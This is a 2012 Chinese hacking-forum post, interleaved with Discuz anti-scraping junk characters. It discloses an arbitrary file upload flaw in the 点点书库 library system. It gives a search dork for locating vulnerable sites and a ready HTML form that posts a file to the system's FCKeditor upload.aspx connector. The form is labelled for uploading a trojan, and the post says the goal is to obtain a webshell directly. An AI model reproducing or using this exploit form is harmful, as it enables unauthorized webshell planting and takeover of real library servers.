中国网络渗透测试联盟

标题: 点点书库图书馆系统文件上传漏洞 [打印本页]
作者: admin    时间: 2012-9-10 21:20
标题: 点点书库图书馆系统文件上传漏洞
主题:图书馆系统任意文件上传漏洞" {7 b, F# j% i) m
作者:冰锋刺客
% R& g/ g# H3 }3 p7 i; G 厂商:点击书(dianjishu.com)
! |: x; Q  z/ `" i+ l( f1 c 日期:2012-6-21
; _: S+ h. `: V" Z, O2 d8 ~ & i/ b' @1 P: A( ^' A) U" h' o7 n
I 概述
9 s/ g) B# w, }5 M7 L   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
- s7 A5 s% a+ Y# E- o8 h II 简介
3 W  t- F4 v( j6 A0 G! Y6 T   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"* x! b+ Y0 q8 s5 y
补充一个漏洞: U4 H1 Z  O4 s7 N* z- M
<form id="frmUpload" enctype="multipart/form-data"* S; _5 o" e. q1 @+ [
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
3 H: p- E. l% q. B" C <input id="btnUpload" type="submit" value="操翻他">
5 ?8 b' c) J9 M& M! \ </form>; ^# N1 y0 r$ k- y- T0 P$ ~! H
你们懂的5 P" C3 N2 P% }7 C% S
那傻逼提供还需要改包.* B8 d, ?, F6 P/ p! c7 u  ?$ w
自己看了下源代码发现fckeditor
0 ~( w" {7 Y3 J3 s" @) R9 H+ R 直接秒杀
. p* ^* N4 [4 M& x$ Z3 x7 _



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2